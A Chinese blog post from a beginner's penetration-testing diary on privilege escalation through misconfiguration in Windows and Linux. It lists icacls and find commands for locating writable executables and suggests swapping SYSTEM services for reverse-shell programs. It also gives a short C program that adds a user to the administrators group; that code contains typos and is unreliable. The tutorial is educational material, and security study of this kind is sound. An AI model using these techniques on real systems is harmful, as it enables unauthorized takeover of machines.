• 小白日记25:kali渗透测试之提权(五)--利用配置不当提权


    利用配置不当提权

    与漏洞提权相比,更常见的方法。在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏洞进行入侵。当入侵一台服务器后,无法照当相应的补丁进行提权,可通过寻找是否存在配置不当进行提权。如:代码中没有进行参数过滤等操作。

    • 通过查看哪些服务默认以system权限启动,可尝试将其替换或绑定反弹shell程序
    • 了解NTFS权限允许users修改删除本身,则可利用其配置不当,完成提权

    XP

    安装了其他软件,打开services.msc本地服务设置,查看该软件是否以本地系统权限启动

    查看应用程序NTFS权限是否可以被普通用户更改【即可执行文件路径】

    ##但不能替换应用程序,以免被发现【默认情况下,普通用户对操作系统中所有文件都没有修改权限】

    命令行下快速查找当前系统下所有exe、con、ini执行程序的NTFS信息

    1、icacls【windows 2003以后的系统中包含的程序】

    icacls c:windows*.exe /save perm /T【查询结果保存为文本文件】

    通过文本文件查找字符串F;;;BU

    kali上生成shellcode把当前用户添加到管理员组

    #include <stdlib.h>
    int main()
    {
       int i;
       i=system("net localgroup administarators a /add");
       return 0'
    }
    
    i586-mingw32msvc-gcc -o admin.exe admin.c
    使用commview小工具进行抓包

    2、linux系统下查找权限设置不安全的程序

    ls -l 【查找当前目录】

    find / -perm 777 -exec ls -l {} ;  【/-perm 777 查找所有权限为777的文件;-exec 执行 ls -l ;;  find命令以其结束】

    提权只是思路

    #若渗透进去的是应用程序

    ·应用系统的配置文件

    通过应用连接数据库的配置文件,发现其连接的服务账号

    后台服务运行账号【有可能root账号运行web服务】

  • 相关阅读:
    面试
    vue axios 应用
    3D全景之ThreeJs
    css垂直居中
    事件处理过程中遇到的问题
    文字溢出
    jquery: 偏移量计算
    jquery: sand picture
    jquery: update carousel logic & animate
    jquery: carousel arrow click
  • 原文地址:https://www.cnblogs.com/zixuanfy/p/5988707.html
Copyright © 2020-2023  润新知